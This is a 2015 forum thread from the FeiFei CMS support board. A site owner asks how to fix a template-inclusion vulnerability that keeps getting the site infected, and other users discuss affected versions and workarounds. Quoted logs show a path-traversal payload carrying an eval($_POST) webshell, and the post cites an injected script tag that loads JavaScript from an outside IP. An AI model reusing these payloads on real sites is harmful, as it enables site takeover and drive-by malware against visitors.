飞飞CMS官方论坛

标题: 老大,就是这个漏洞啊,怎么修复啊,天天挂马 [打印本页]

作者: ooola    时间: 2015-3-24 21:32
标题: 老大,就是这个漏洞啊,怎么修复啊,天天挂马
漏洞危害等级非常高,只要被盯上了,有的烦哦。

wooyun.org/bugs/wooyun-2010-082291

下面是后台监控到的日志。

[ 2015-03-24T20:08:54+08:00 ] ERR: (ThinkException) 模板不存在[my_\..\runtime\logs\15_03_16.log]
[ 2015-03-24T20:09:09+08:00 ] ERR: (ThinkException) 模板不存在[my_\..\runtime\logs\15_03_16.log]
[ 2015-03-24T20:09:20+08:00 ] ERR: (ThinkException) 模板不存在[my_\..\runtime\logs\{~eval($_POST[x])}]
[ 2015-03-24T20:09:20+08:00 ] ERR: (ThinkException) 模板不存在[./Tpl/1080p/Home/my_new.html]
[ 2015-03-24T20:09:26+08:00 ] ERR: (ThinkException) 模板不存在[./Tpl/1080p/Home/my_new.html]


挂马的就是这个 狗日的。:

document.write('<script type="text/javascript" src="htt##p:/###/121.40.113.68/header.js"></script>');
发不了连接 #号隔开

当前处理办法:tpl 目录完全不可写。木马就写到 runtime 目录了

作者: tom    时间: 2015-3-25 11:36
哪个版本的?我怎么没有呢
作者: 淘金者    时间: 2015-3-25 12:09
这个不是最新版本的漏洞吧
作者: tom    时间: 2015-3-25 12:51
哦,那就好,我用的3.0的,只要3.0没有就ok
作者: wwi    时间: 2015-3-25 12:59
版本2.9的 这个漏洞很隐瞒,别高兴太早了,应该是哪里过滤不严。

用手机访问 ff 建的站,很多都中招。

平常是很难发现的。一打开下载 apk 安卓软件

好多人中了 都不知道的。
作者: nilo    时间: 2015-3-28 02:05
3.0也有漏洞的.在会员系统这块.
作者: 846262261    时间: 2015-4-18 10:20
thinkphp框架问题吧  这框架好久都不更新的 自己更新下吧




欢迎光临 飞飞CMS官方论坛 (http://bbs.feifeicms.wang/) Powered by Discuz! X3.2